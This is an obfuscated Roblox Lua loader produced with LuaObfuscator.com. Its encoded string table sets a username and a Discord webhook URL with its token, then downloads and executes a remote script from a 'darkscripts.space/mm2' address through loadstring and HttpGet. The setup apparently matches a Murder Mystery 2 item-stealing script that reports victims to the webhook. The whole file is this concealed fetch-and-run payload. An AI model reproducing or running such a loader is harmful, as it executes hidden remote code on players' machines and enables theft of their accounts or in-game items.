--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v91=v2(v0(v30,16));if v19 then local v113=v5(v91,v19);v19=nil;return v113;else return v91;end end end);local function v20(v31,v32,v33) if v33 then local v92=(877 -(282 + 595)) -0 ;local v93;while true do if (v92==0) then v93=(v31/(2^(v32-(2 -1))))%((3 -1)^(((v33-((1639 -(1523 + 114)) -(1 + 0))) -(v32-1)) + (620 -(555 + 64)))) ;return v93-(v93%(932 -(857 + 74))) ;end end else local v94=((812 -242) -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v94 + v94))>=v94) and (1 + 0)) or ((1065 -(68 + 997)) + 0) ;end end local function v21() local v34=117 -(8 + 24 + 85) ;local v35;while true do if (v34==(1271 -(226 + 1044))) then return v35;end if (v34==((957 -(892 + 65)) -0)) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=1;end end end local function v22() local v36=(0 + 0) -0 ;local v37;local v38;while true do if (v36==0) then v37,v38=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -1) ;v36=1;end if (v36==(351 -(87 + 263))) then return (v38 * (436 -(67 + 113))) + v37 ;end end end local function v23() local v39=0 -0 ;local v40;local v41;local v42;local v43;while true do if (v39==1) then return (v43 * (12338840 + 4438376)) + (v42 * 65536) + (v41 * ((741 + 276) -761)) + v40 ;end if (v39==(952 -(802 + 150))) then v40,v41,v42,v43=v1(v16,v18,v18 + 3 );v18=v18 + (10 -6) ;v39=1 -0 ;end end end local function v24() local v44=997 -(915 + 82) ;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44==(5 -3)) then v49=v20(v46,13 + 8 ,40 -9 );v50=((v20(v46,1219 -(1069 + 118) )==1) and  -(2 -(3 -2))) or (1 -0) ;v44=1 + 2 ;end if (v44==((0 -0) -(859 -(814 + 45)))) then v45=v23();v46=v23();v44=(2 -1) + 0 ;end if (v44==(794 -(368 + 23 + 400))) then if (v49==(0 -0)) then if (v48==0) then return v50 * (18 -(4 + 6 + 8)) ;else local v122=0 -0 ;while true do if (v122==(442 -(416 + 26))) then v49=3 -2 ;v47=0 + 0 ;break;end end end elseif (v49==(3621 -1574)) then return ((v48==(438 -(145 + 293))) and (v50 * ((886 -(261 + 624))/0))) or (v50 * NaN) ;end return v8(v50,v49-(1453 -(44 + 386)) ) * (v47 + (v48/((1488 -(998 + 488))^(17 + 35)))) ;end if ((1 + 0)==v44) then v47=1 -0 ;v48=(v20(v46,773 -(201 + (1651 -(1020 + 60))) ,1158 -(116 + 1022) ) * ((8 -6)^(19 + 13))) + v45 ;v44=2;end end end local function v25(v51) local v52=1423 -(630 + 793) ;local v53;local v54;while true do if (v52==((701 -(376 + 325)) -0)) then v53=nil;if  not v51 then local v120=0 -0 ;while true do if ((0 + (0 -0))==v120) then v51=v23();if (v51==(0 + 0)) then return "";end break;end end end v52=3 -2 ;end if ((1748 -(760 + (1616 -629)))==v52) then v53=v3(v16,v18,(v18 + v51) -(1914 -(512 + 1277 + 124)) );v18=v18 + v51 ;v52=4 -2 ;end if (v52==(768 -(745 + (35 -(9 + 5))))) then v54={};for v114=1 + 0 , #v53 do v54[v114]=v2(v1(v3(v53,v114,v114)));end v52=8 -5 ;end if ((7 -4)==v52) then return v6(v54);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v55=(function() return function(v95,v96,v97,v98,v99,v100,v101,v102,v103) local v104=(function() return 0;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do if (v104==(0 + 0)) then v95=(function() return 0;end)();v96=(function() return nil;end)();v104=(function() return 1;end)();end if (v104~=(1025 -(706 + 318))) then else local v121=(function() return 0 + 0 ;end)();while true do if (v121==(1271 -(945 + 326))) then local v126=(function() return 0;end)();while true do if (v126==(0 + 0)) then while true do if (v95~=(0 -0)) then else v96=(function() return v97();end)();if (v98(v96, #":", #".")~=0) then else local v178=(function() return 0 -0 ;end)();local v179=(function() return;end)();local v180=(function() return;end)();local v181=(function() return;end)();while true do if (v178~=1) then else local v185=(function() return 0 + 0 ;end)();while true do if (v185==0) then v181=(function() return {v99(),v99(),nil,nil};end)();if (v179==(0 + 0)) then local v191=(function() return 1636 -(1373 + 263) ;end)();local v192=(function() return;end)();while true do if (v191==(1086 -(461 + 625))) then v192=(function() return 1288 -(993 + 295) ;end)();while true do if ((0 + 0)~=v192) then else v181[ #"-19"]=(function() return v99();end)();v181[ #".com"]=(function() return v99();end)();break;end end break;end end elseif (v179== #"[") then v181[ #"xnx"]=(function() return v100();end)();elseif (v179==(1173 -(418 + 753))) then v181[ #"gha"]=(function() return v100() -(2^(7 + 9)) ;end)();elseif (v179~= #"gha") then else local v197=(function() return 1000 -(451 + 549) ;end)();while true do if (v197==0) then v181[ #"xnx"]=(function() return v100() -((1 + 1)^(5 + 11)) ;end)();v181[ #"0313"]=(function() return v99();end)();break;end end end v185=(function() return 1;end)();end if (v185==1) then v178=(function() return 2 -0 ;end)();break;end end end if (v178==(2 -0)) then if (v98(v180, #",", #".")~= #".") then else v181[1386 -(746 + 638) ]=(function() return v101[v181[1 + 1 ]];end)();end if (v98(v180,531 -(406 + 123) ,2)== #":") then v181[ #"91("]=(function() return v101[v181[ #"nil"]];end)();end v178=(function() return 3;end)();end if ((1772 -(1749 + 20))==v178) then if (v98(v180, #"-19", #"-19")~= #"\\") then else v181[ #"asd1"]=(function() return v101[v181[ #"0836"]];end)();end v102[v103]=(function() return v181;end)();break;end if (v178==(0 -0)) then local v187=(function() return 0;end)();while true do if (1==v187) then v178=(function() return 342 -(218 + 123) ;end)();break;end if ((1581 -(1535 + 46))~=v187) then else v179=(function() return v98(v96,2 + 0 , #"gha");end)();v180=(function() return v98(v96, #"http",1 + 5 );end)();v187=(function() return 561 -(306 + 254) ;end)();end end end end end break;end end return v95,v96,v97,v98,v99,v100,v101,v102,v103;end end end end end end end;end)();local v56=(function() return function(v105,v106,v107) local v108=(function() return 0 + 0 ;end)();local v109=(function() return;end)();while true do if (v108~=(0 -0)) then else v109=(function() return 0;end)();while true do if ((0 + 0)==v109) then local v127=(function() return 0;end)();local v128=(function() return;end)();while true do if (v127==(1145 -(466 + 679))) then v128=(function() return 1467 -(899 + 568) ;end)();while true do if (v128~=0) then else local v172=(function() return 0 -0 ;end)();while true do if ((0 -0)~=v172) then else v105[v106-#"|" ]=(function() return v107();end)();return v105,v106,v107;end end end end break;end end end end break;end end end;end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {};end)();local v60=(function() return {v57,v58,nil,v59};end)();local v61=(function() return v23();end)();local v62=(function() return {};end)();for v70= #"]",v61 do local v71=(function() return 0 + 0 ;end)();local v72=(function() return;end)();local v73=(function() return;end)();local v74=(function() return;end)();while true do if (v71~=1) then else v74=(function() return nil;end)();while true do if (v72~=(0 + 0)) then else local v123=(function() return 0 -0 ;end)();local v124=(function() return;end)();while true do if (v123~=(0 + 0)) then else v124=(function() return 114 -(4 + 110) ;end)();while true do if ((585 -(57 + 527))==v124) then v72=(function() return 2 -1 ;end)();break;end if (v124~=(603 -(268 + 335))) then else local v165=(function() return 290 -(60 + 230) ;end)();while true do if (v165~=(572 -(426 + 146))) then else v73=(function() return v21();end)();v74=(function() return nil;end)();v165=(function() return 1 + 0 ;end)();end if (v165==(1 + 0)) then v124=(function() return 2 -1 ;end)();break;end end end end break;end end end if ((1457 -(282 + 1174))~=v72) then else if (v73== #"[") then v74=(function() return v21()~=(0 -0) ;end)();elseif (v73==2) then v74=(function() return v24();end)();elseif (v73== #"nil") then v74=(function() return v25();end)();end v62[v70]=(function() return v74;end)();break;end end break;end if (v71~=0) then else v72=(function() return 811 -(569 + 242) ;end)();v73=(function() return nil;end)();v71=(function() return 2 -1 ;end)();end end end v60[ #"asd"]=(function() return v21();end)();for v75= #"{",v23() do FlatIdent_781F8,Descriptor,v21,v20,v22,v23,v62,v57,v75=(function() return v55(FlatIdent_781F8,Descriptor,v21,v20,v22,v23,v62,v57,v75);end)();end for v76= #"|",v23() do v58,v76,v28=(function() return v56(v58,v76,v28);end)();end return v60;end local function v29(v64,v65,v66) local v67=v64[1 + 0 ];local v68=v64[1 + 1 ];local v69=v64[5 -2 ];return function(...) local v77=v67;local v78=v68;local v79=v69;local v80=v27;local v81=66 -(30 + 35) ;local v82= -(1 + 0);local v83={};local v84={...};local v85=v12("#",...) -(3 -2) ;local v86={};local v87={};for v110=1212 -(323 + 889) ,v85 do if ((v110>=v79) or (1485>2550)) then v83[v110-v79 ]=v84[v110 + (2 -1) ];else v87[v110]=v84[v110 + (581 -(361 + 219)) ];end end local v88=(v85-v79) + (321 -(53 + 267)) ;local v89;local v90;while true do v89=v77[v81];v90=v89[1 + 0 ];if ((v90<=(1587 -(1183 + 397))) or (3315<=2782)) then if ((v90<=((912 -496) -((35 -20) + 398))) or (876>=2964)) then if ((v90<=(983 -(18 + 964))) or (2232>2497)) then if (v90>0) then local v129=0 -0 ;local v130;local v131;local v132;local v133;while true do if (v129==(1 + 0)) then v82=(v132 + v130) -(1 + 0 + 0) ;v133=850 -(20 + 830) ;v129=2 + 0 ;end if ((128 -(116 + (1700 -(1121 + 569))))==v129) then for v173=v130,v82 do v133=v133 + 1 + 0 ;v87[v173]=v131[v133];end break;end if (v129==(1933 -((779 -(22 + 192)) + 1368))) then v130=v89[(1423 -(483 + 200)) -(542 + (1659 -(1404 + 59))) ];v131,v132=v80(v87[v130](v13(v87,v130 + (1 -(0 -0)) ,v89[1 + 2 ])));v129=1 + 0 ;end end else v87[v89[2 + 0 ]]=v89[(2 -0) + 1 ];end elseif (v90==(4 -2)) then do return;end else do return;end end elseif ((v90<=(12 -7)) or (2110<=332)) then if (v90>(1555 -(1126 + 425))) then v66[v89[479 -(41 + 435) ]]=v87[v89[1003 -(938 + 63) ]];else local v138=v89[2 + 0 ];local v139=v87[v89[1128 -(936 + 189) ]];v87[v138 + (406 -(118 + 287)) ]=v139;v87[v138]=v139[v89[15 -11 ]];end elseif (v90==(2 + 4)) then v66[v89[(1889 -(468 + 297)) -(118 + 1003) ]]=v87[v89[2 + 0 ]];else v87[v89[(567 -(334 + 228)) -3 ]]=v89[380 -(142 + 235) ];end elseif (v90<=(278 -(176 + 91))) then if ((3686>3172) and (v90<=(23 -14))) then if (v90==(36 -28)) then v87[v89[1 + 1 ]]=v66[v89[3]];else local v149=v89[1877 -(157 + 1718) ];local v150=v87[v89[980 -(553 + (1430 -1006)) ]];v87[v149 + 1 ]=v150;v87[v149]=v150[v89[7 -3 ]];end elseif (v90>(34 -24)) then v87[v89[2]]();else local v154=0 + 0 ;local v155;while true do if (v154==(1018 -(697 + 321))) then v155=v89[2 + 0 ];v87[v155]=v87[v155](v13(v87,v155 + 1 + (0 -0) ,v82));break;end end end elseif ((v90<=(6 + (12 -5))) or (4474<820)) then if ((4279>=2882) and (v90==(5 + 7))) then v87[v89[2 + 0 ]]=v66[v89[6 -3 ]];else v87[v89[2]]();end elseif ((v90==(1241 -(322 + 905))) or (2029>=3521)) then local v158=0 -0 ;local v159;local v160;local v161;local v162;while true do if ((((1 + 1) -1)==v158) or (2037>=4642)) then v82=(v161 + v159) -((237 -(141 + 95)) + 0) ;v162=(0 + 0) -(0 -0) ;v158=949 -(245 + 702) ;end if ((753 -(239 + 514))==v158) then v159=v89[1 + 1 ];v160,v161=v80(v87[v159](v13(v87,v159 + 1 + 0 ,v89[1332 -(797 + 532) ])));v158=1 + 0 ;end if (v158==(6 -4)) then for v176=v159,v82 do local v177=0 + 0 ;while true do if (v177==(0 -0)) then v162=v162 + (1203 -(373 + 829)) ;v87[v176]=v160[v162];break;end end end break;end end else local v163=731 -(476 + 255) ;local v164;while true do if (v163==((2716 -1586) -(369 + 761))) then v164=v89[1 + 1 ];v87[v164]=v87[v164](v13(v87,v164 + 1 + 0 ,v82));break;end end end v81=v81 + (1 -0) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!083Q0003083Q00557365726E616D6503143Q007369796168676979656E67656E6379743534363303073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F313239313330333439303234383736393633382F38734F4B6E6A4F4833703649485741672D3169437A37716C67414B6B2Q6E74414A42315947592Q587336637666624E34775F44695A616A6D584A512Q386C435432707737030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574031D3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F2Q6D32000C3Q00124Q00023Q0012053Q00013Q00124Q00043Q0012053Q00033Q00120C3Q00053Q00120C000100063Q00200400010001000700122Q000300084Q0001000100034Q000F5Q00022Q000B3Q000100012Q00023Q00017Q00",v9(),...);
